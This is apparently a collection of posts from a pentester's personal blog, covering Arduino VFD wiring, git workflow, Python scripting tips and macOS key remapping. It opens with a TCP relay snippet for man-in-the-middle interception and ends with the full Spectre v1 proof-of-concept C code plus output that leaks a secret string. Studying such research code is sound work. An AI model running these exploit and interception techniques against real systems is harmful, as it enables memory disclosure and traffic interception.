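At their core, tools like striptls are TCP relays sitting between the client and the real server. Below is a minimal sketch of that idea in plain Python sockets (the helper names are mine; striptls itself does much more, like rewriting the STARTTLS exchange):

```python
import socket
import threading

def pipe(src, dst):
    # Shovel bytes one direction until the source side closes.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)  # pass the EOF along
    except OSError:
        pass  # the other side may already be gone

def serve_once(listen_port, remote_host, remote_port, ready=None):
    # Accept a single client and splice it to the remote endpoint.
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    if ready is not None:
        ready.set()  # signal that we're accepting connections
    client, _ = srv.accept()
    remote = socket.create_connection((remote_host, remote_port))
    t = threading.Thread(target=pipe, args=(client, remote))
    t.start()             # client -> remote in a helper thread
    pipe(remote, client)  # remote -> client in this thread
    t.join()
    client.close()
    remote.close()
    srv.close()
```

With the iptables REDIRECT rule in place, the target's port-443 traffic lands on the listening port, so for a single fixed target the relay never needs to recover the original destination.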
Thursday, July 12, 2018
Noritake VFD Setup
I recently got my hands on a Noritake CU24025ECPB-U1J Vacuum Fluorescent Display. I always enjoyed the retro 80s/90s feel of VFDs and wanted to gain some experience with one. Below is a picture of the back for reference:
The model of VFD I got comes with its own driver board, so it's super easy to just send it the text you want over the parallel lines and let the VFD driver take care of the rest. Lots of Noritake's models state that there is a 5 or 6 pin serial port on the driver board, allowing you to use sync/async serial instead of parallel. Well, I must have been the unlucky one, since apparently all I have is a parallel connection (on the far right of the above image). Luckily that's no big deal, because Noritake's documentation and sample files make life quite easy.
There are several parts to getting this VFD to work.
- Hookup
- Downloading the Noritake Arduino Library
- Uploading the sample code
- Enjoying the VFD
The Hookup
Hookup was relatively easy once I found the proper documentation describing the pinout.
The only thing even close to a datasheet for my exact model of VFD was off of DigiKey's website: https://media.digikey.com/pdf/Data%20Sheets/Noritake%20PDFs/CU24025ECPB-U1J.pdf
There you can see the pin layout towards the bottom of the page:
If you are using the sample code outlined later in this post, the connections for the parallel connector to the Arduino are below:
VFD -> Arduino Pin
1 (GND) > GND
2 (VCC) > VCC
3 (Not Connected)
4 (RS) > 9
5 (RW) > 10
6 (E) > 11
7 (D0) > 12 //Originally it was 0 but it causes problems with uploading the sketch, so I switched it.
8 (D1) > 13 //Originally it was 1 but it causes problems with uploading the sketch, so I switched it.
9 (D2) > 2
10 (D3) > 3
11 (D4) > 4
12 (D5) > 5
13 (D6) > 6
14 (D7) > 7
Now that you have it hooked up, double check your connections so it looks like this:
Downloading The Library
Noritake provides an Arduino library at https://www.noritake-elec.com/user/download?id=Arduino_Noritake_VFD_CUU&category=10&type=cuu
Download the zip and add it to your Arduino libraries by going to Sketch > Include Library > Add .ZIP Library. Once I did that, it didn't show up in the menu listing of my libraries, but it did show up as "cuu" if I clicked "Manage Libraries".
Uploading The Sample Code
Below is the code I used/modified to get it working for my board. I only changed the mode I was using and the pin configuration, but other than that it's basically the same as the sample code Noritake provides in their QuickStart guide:
#include <CUU_Interface.h>
#include <CUU_Parallel_I80.h>
#include <CUU_Parallel_M68.h>
#include <CUU_Serial.h>
#include <Noritake_VFD_CUU.h>

/* VFD  > Arduino
 1 GND  > GND
 2 VCC  > VCC
 3 NC
 4 RS   > 9
 5 RW   > 10
 6 E    > 11
 7 DB0  > 12
 8 DB1  > 13
 9 DB2  > 2
10 DB3  > 3
11 DB4  > 4
12 DB5  > 5
13 DB6  > 6
14 DB7  > 7
*/

//Changed D0, D1 from Arduino 0,1 to Arduino 12,13 so it will upload the sketch fine.
//Apparently it can't upload if there is anything connected to 0,1 on upload :/
CUU_Parallel_M68 interface(9,10,11, 12,13,2,3,4,5,6,7); //RS,WR,RD,D0-D7

Noritake_VFD_CUU vfd;

void setup() {
  _delay_ms(500);              // wait for device to power up
  vfd.begin(20, 2);            // 20x2 character module
  vfd.interface(interface);    // select which interface to use
  vfd.CUU_init();              // initialize module
  vfd.print("O HAI THERE :D"); // print some text
}

void loop() {
}
Enjoying The VFD
And enjoying it, I am. Noritake made it relatively easy to get up and running quite quickly, so I greatly appreciate that.
Now the next step is to modify the code so it takes input from a serial connection so I can control it using a python script. Maybe a retro twitter scroller? I dunno :D
References For Reference :)
Arduino QuickStart Guide: https://www.noritake-elec.com/support/design-resources/support-guide/arduino-code-library-quick-start-guide
Noritake Overview: http://www.noritake-itron.com/NewWeb/GVFD/Overview/Overview.asp
Cu-U Application Notes: https://noritake-elec.com/includes/documents/brochure/CU-U_Application_Note.pdf
Labels:
Hardware,
Just For Fun
Wednesday, May 9, 2018
A Method For Battling Procrastination
I discovered a technique that has helped me battle my own procrastination for getting tasks done. The procrastination most often happened when I had to write my pentest reports.
I often found myself avoiding the report and doing something else. Regardless of whatever reason I could come up with, I knew it was a psychological reason I was not accomplishing this task. Rarely, if ever, was there a concrete reason for holding off writing.
The trick I discovered was when I thought, "maybe I don't want to do it because it feels large and imposing. It feels like I couldn't accomplish it, and so I don't even want to start". That's when I started to break the task down...and down...and so far down that no person in the world could say "I can't do that".
So the last item on my to-do list would simply say something like:
- Write <CLIENT> report
Anxiety/procrastination sets in, so I break it down:
- Write <CLIENT> report
- Write executive summary
- Write narrative
- Write findings
Nope, still got that procrastination, lets take it to the extreme:
- Write <CLIENT> report
- open the file
- change filename, dates and title
- Write executive summary
- summarize important findings
- etc
- Write narrative
- start with explaining pentest network position
- write recon perspective and returned ports/OSs
- start writing chronologically the attack timeline
- etc
- Write findings
- Write findings you remember from your notes
- Gather screenshots/evidence from logs
- Select the finding templates or make your own
- etc
- Send report to QA
Breaking it out this far helped my brain to feel that no matter how big this project is, all I had to do was focus on the singular next piece. No matter how much I wanted to procrastinate, I could at least open the file, I could at least change the dates.
Starting, I found, is the most important step. Motivation to complete something arises AFTER starting that something.
Good luck in life, I hope this technique can help you too.
PS.
This is a general technique, applicable to anything from pentest reports to woodwork projects to picking investments, apply liberally, rinse and repeat.
Labels:
Administrative,
Personal Development
Wednesday, April 4, 2018
Contributing to Github Projects
The following are some personal notes on the basic workflow for contributing to a project on Github.
- Visit the project's repo page (https://github.com/someguy/nice_project), click on "Fork" in the upper right corner.
- Clone your newly forked repo to your local machine
- Set an "upstream" remote so you can pull down "someguy"s code whenever you need to.
- Create a branch of the master or dev or whatever so you can start making your changes. Give it a meaningful name:
- Make your changes, add the files and make a commit:
- Push your changes to your forked repo. Typically known as the 'origin' remote:
- Log into Github and you should see a notification on your forked repo
- Click on the "Compare & pull request"
- Fill out the pull request, and then hit "Create pull request"
- Now you just wait on comments, requests, ridicule, or anything else. Once they are happy with your contributions they will "merge" your changes into their branch.
- Once its accepted you can delete that branch either through the Github website or at the CLI:
- Now you can pull down the updated upstream to see your changes in someguy's repo:
- If you'd like you can update your GH repo by pushing what you recently pulled down:
git clone https://github.com/you/nice_project
git remote add upstream https://github.com/someguy/nice_project
git branch bugFix-UTFencoding
git checkout bugFix-UTFencoding
#or all in one with: git checkout -b bugFix-UTFencoding
git add lib/some_file
git commit -m 'fixed the UTF encoding errors'
git push origin bugFix-UTFencoding
git checkout master #it complains if you try to delete a branch you are on
git branch -D bugFix-UTFencoding
git pull upstream master
git push origin master
Congrats on getting your pull request accepted and contributing to something. You will now feel slightly less like a leech.
Rinse and repeat steps 4-10 on the same project, or the whole thing for a new project.
Bonus: If you want to pull down a specific branch from a remote upstream, you can easily do it with "git checkout -b up-master upstream/master"
Labels:
Programming
Friday, March 23, 2018
Resume Your Script After Canceling It
Several times in the past I had to write a script that iterates over a dictionary file, or brute-forces a web login, or whatever. Often you'd like to make modifications to the script, forcing you to cancel it, edit it, and start it over. The starting-over part is what I hate. It took me a while to realize this (I has the dumb) but you can easily create a resume-like function in your scripts. Just use a counter!
For example your original function is something like this:
for thing in things:
    result = haxor_the_thing(thing)
    print("{} resulted in {}".format(thing, result))
Which is your basic for loop in python, nothing new here. But lets say you ran that for a while and it outputted a couple hundred lines. You don't want to start all over again right? You need to make an edit, so you ctrl-c it, edit it, and also add in this little bit:
count = 0
for thing in things:
    if count >= 243:  # skip the entries already processed in the previous run
        result = haxor_the_thing(thing)
        print("{} resulted in {}".format(thing, result))
    count += 1
That's it. The "243" is just the number of entries already processed, i.e. where it should start off again. So what happens here is the script begins, sees count = 0, and doesn't run the "haxor_the_thing()" function. It won't run it until the counter reaches 243, thereby skipping the first 243 entries and restarting the function on the 244th entry.
If I have to cancel it again, I do a quick copy-paste of the output, count the lines in ST3, and just change it to "if count >= 243 + 534:". This is obviously not the _best_ way to do this, but it sure as hell is fast.
I mean, this may seem obvious to certain people but this makes a person's life much easier.
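If you'd rather not count output lines at all, the counter can be persisted to disk between runs. Here's a sketch of that idea (the helper and state-file names are mine, not from the original script):

```python
import os

def resume_iter(things, state_file="progress.txt"):
    # Yield entries, skipping the ones finished in a previous run.
    start = 0
    if os.path.exists(state_file):
        with open(state_file) as f:
            start = int(f.read().strip() or 0)
    for count, thing in enumerate(things):
        if count < start:
            continue  # already handled last time
        # Record the position *before* handing the entry out, so a
        # cancelled run re-does the in-flight entry instead of skipping it.
        with open(state_file, "w") as f:
            f.write(str(count))
        yield thing
```

Loop with "for thing in resume_iter(things):", ctrl-c it, edit, and rerun; it picks up where it left off. Delete the state file once a run completes cleanly.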
Labels:
Network,
Programming,
Python
Monday, March 19, 2018
Convert IP Notation - (X.X.X.X-X.X.Y.Z -> Individual IPs)
I was provided a list of IPs and ranges; most of them were in the format of 1.1.1.1-1.1.1.4. Nmap doesn't like this format; nmap likes the format 1.1.1.1-4. This is easy if everything is a /24. Most of my ranges were not. I used the iptools Python module written for Django to parse the IPs. All I had to do was supply a properly formatted file (no spaces around the dash) and boom, each possible IP was spit out.
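For reference, the same expansion can be done with nothing but the stdlib ipaddress module in Python 3. This is a sketch (the helper name is mine, not part of iptools):

```python
import ipaddress

def expand_range(line):
    # "1.1.1.1-1.1.1.4" -> each individual IP in the range, inclusive
    line = line.strip()
    if '-' not in line:
        return [line]  # bare IPs pass through unchanged
    start_s, end_s = line.split('-')
    start = int(ipaddress.IPv4Address(start_s))
    end = int(ipaddress.IPv4Address(end_s))
    return [str(ipaddress.IPv4Address(i)) for i in range(start, end + 1)]

for ip in expand_range("1.1.1.1-1.1.1.4"):
    print(ip)
```

Treating addresses as integers handles ranges that cross octet boundaries (the non-/24 case) for free.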
Labels:
Network,
Programming,
Python
Tuesday, February 20, 2018
Reddit Watcher - Watch All Reddit Posts For Special Keyword
I was playing around last night with the Reddit API and found that it allows for streaming content from /r/all. This effectively means that every (public) submission can be parsed and played with. I decided to write a small script to check if a certain keyword is in the title of each submission.
You can extend this in a bunch of other ways:
- Instead of printing to screen, send to twilio or OSX popups
- Extend the keyword checking to the content or their comments
- Restrict the catchall subreddit /r/all to something more specific like /r/netsec
- Pump the submission through sentiment analysis and graph over time to figure out if people hate you
Below is the code for the script:
#!/usr/bin/env python3
import praw

keyword = " i "
client_id = 'x-CLIENTIDHERE'
client_secret = 'ioID-CLIENTSECRETHERE'
user_agent = 'OSX:myscripthere:v1.0 (by /u/myuserhere)'

reddit = praw.Reddit(client_id=client_id,
                     client_secret=client_secret,
                     user_agent=user_agent)

for submission in reddit.subreddit('all').stream.submissions():
    if keyword in submission.title.lower():
        print('https://reddit.com/%s : /r/%s - %s ' % (submission.id, submission.subreddit, submission.title))
Once you run that with your specific OAUTH details, you'll get streaming submissions outputted to your screen:
Currently the script is only triggering if the word " I " is in the post (for testing), obviously change to your specific keyword.
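The space-padded " i " keyword is a quick hack for whole-word matching; a regex with word boundaries also matches when the keyword starts or ends the title. A sketch (the helper name is mine):

```python
import re

def title_matches(title, keyword):
    # \b anchors the keyword at word boundaries, so "i" won't fire on
    # "in" or "inside", but still matches at the start or end of a title.
    pattern = r'\b{}\b'.format(re.escape(keyword))
    return re.search(pattern, title, re.IGNORECASE) is not None
```

Then swap the `if keyword in submission.title.lower():` check for `if title_matches(submission.title, "i"):`.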
Labels:
Just For Fun,
Programming,
Python,
Web
Friday, January 19, 2018
Remap Right Shift To Up Arrow OSX
The up arrow on the new 2017 MacBook Pros is stupidly small and very difficult to hit accurately. This can be extremely annoying when you're in a terminal and need to hit "up" several times to go through your history.
Unfortunately there is no builtin way to modify the right shift key and map it to arbitrary keys. Fortunately, however, there is an app call "Karabiner" that grants you this functionality at an OS level. Meaning, it's not application specific.
The process is incredibly simple:
Unfortunately there is no built-in way to modify the right shift key and map it to arbitrary keys. Fortunately, however, there is an app called "Karabiner" that grants you this functionality at the OS level. Meaning, it's not application-specific.
The process is incredibly simple:
- Download Karabiner
- Go to the "Simple Modifications" tab
- Click "Add Item"
- From Key: right_shift, To Key: up_arrow as seen below:
Enjoy!
Labels:
Administrative,
OSX,
Shells
Thursday, January 4, 2018
Spectre on Apple MacBook Pro Retina
I have a test machine running 10.13.2 on a MacBook Pro Retina 2017 running an Intel Core i7. The below PoC C code works when compiled with the following command:
gcc -march=native -std=c11 -o spectre spectre.c; ./spectre
Save the below PoC code as "spectre.c"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);
    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      time1 = __rdtscp( & junk); /* READ TIMER */
      junk = * addr; /* MEMORY ACCESS TO TIME */
      time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
      if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  }
  results[0] ^= junk; /* use junk so code above won't get optimized out */
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2];

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  return (0);
}
The original code came from the Spectre paper, but it required a tiny patch from a gist page to work on macOS (Google it and you can find it).
If you run it, this is what you should expect:
$ gcc -march=native -std=c11 -o spectre spectre.c; ./spectre
Reading 40 bytes:
Reading at malicious_x = 0xfffffffffffffebe... Unclear: 0x54='T' score=931 (second best: 0x00 score=912)
Reading at malicious_x = 0xfffffffffffffebf... Unclear: 0x68='h' score=974 (second best: 0x00 score=952)
Reading at malicious_x = 0xfffffffffffffec0... Unclear: 0x65='e' score=985 (second best: 0x01 score=842)
Reading at malicious_x = 0xfffffffffffffec1... Unclear: 0x20=' ' score=985 (second best: 0x00 score=957)
Reading at malicious_x = 0xfffffffffffffec2... Unclear: 0x4D='M' score=994 (second best: 0x00 score=982)
Reading at malicious_x = 0xfffffffffffffec3... Unclear: 0x61='a' score=992 (second best: 0x00 score=972)
Reading at malicious_x = 0xfffffffffffffec4... Unclear: 0x67='g' score=997 (second best: 0x00 score=977)
Reading at malicious_x = 0xfffffffffffffec5... Unclear: 0x69='i' score=994 (second best: 0x00 score=965)
Reading at malicious_x = 0xfffffffffffffec6... Unclear: 0x63='c' score=989 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffec7... Unclear: 0x20=' ' score=978 (second best: 0x00 score=961)
Reading at malicious_x = 0xfffffffffffffec8... Unclear: 0x57='W' score=992 (second best: 0x00 score=973)
Reading at malicious_x = 0xfffffffffffffec9... Unclear: 0x6F='o' score=992 (second best: 0x00 score=974)
Reading at malicious_x = 0xfffffffffffffeca... Unclear: 0x72='r' score=999 (second best: 0x00 score=986)
Reading at malicious_x = 0xfffffffffffffecb... Unclear: 0x64='d' score=988 (second best: 0x00 score=970)
Reading at malicious_x = 0xfffffffffffffecc... Unclear: 0x73='s' score=995 (second best: 0x00 score=967)
Reading at malicious_x = 0xfffffffffffffecd... Unclear: 0x20=' ' score=990 (second best: 0x00 score=978)
Reading at malicious_x = 0xfffffffffffffece... Unclear: 0x61='a' score=985 (second best: 0x00 score=961)
Reading at malicious_x = 0xfffffffffffffecf... Unclear: 0x72='r' score=998 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffed0... Unclear: 0x65='e' score=987 (second best: 0x00 score=953)
Reading at malicious_x = 0xfffffffffffffed1... Unclear: 0x20=' ' score=986 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffed2... Unclear: 0x53='S' score=952 (second best: 0x00 score=925)
Reading at malicious_x = 0xfffffffffffffed3... Unclear: 0x71='q' score=991 (second best: 0x00 score=981)
Reading at malicious_x = 0xfffffffffffffed4... Unclear: 0x75='u' score=964 (second best: 0x00 score=948)
Reading at malicious_x = 0xfffffffffffffed5... Unclear: 0x65='e' score=987 (second best: 0x00 score=971)
Reading at malicious_x = 0xfffffffffffffed6... Unclear: 0x61='a' score=981 (second best: 0x00 score=936)
Reading at malicious_x = 0xfffffffffffffed7... Unclear: 0x6D='m' score=997 (second best: 0x00 score=987)
Reading at malicious_x = 0xfffffffffffffed8... Unclear: 0x69='i' score=997 (second best: 0x01 score=899)
Reading at malicious_x = 0xfffffffffffffed9... Unclear: 0x73='s' score=999 (second best: 0x00 score=971)
Reading at malicious_x = 0xfffffffffffffeda... Unclear: 0x68='h' score=997 (second best: 0x00 score=977)
Reading at malicious_x = 0xfffffffffffffedb... Unclear: 0x20=' ' score=992 (second best: 0x00 score=979)
Reading at malicious_x = 0xfffffffffffffedc... Unclear: 0x4F='O' score=980 (second best: 0x00 score=914)
Reading at malicious_x = 0xfffffffffffffedd... Unclear: 0x73='s' score=994 (second best: 0x00 score=941)
Reading at malicious_x = 0xfffffffffffffede... Unclear: 0x73='s' score=931 (second best: 0x00 score=901)
Reading at malicious_x = 0xfffffffffffffedf... Unclear: 0x69='i' score=999 (second best: 0x00 score=980)
Reading at malicious_x = 0xfffffffffffffee0... Unclear: 0x66='f' score=878 (second best: 0x00 score=847)
Reading at malicious_x = 0xfffffffffffffee1... Unclear: 0x72='r' score=997 (second best: 0x00 score=949)
Reading at malicious_x = 0xfffffffffffffee2... Unclear: 0x61='a' score=988 (second best: 0x00 score=962)
Reading at malicious_x = 0xfffffffffffffee3... Unclear: 0x67='g' score=997 (second best: 0x00 score=951)
Reading at malicious_x = 0xfffffffffffffee4... Unclear: 0x65='e' score=996 (second best: 0x00 score=985)
Reading at malicious_x = 0xfffffffffffffee5... Unclear: 0x2E='.' score=989 (second best: 0x00 score=973)
Labels:
Exploit Dev,
Programming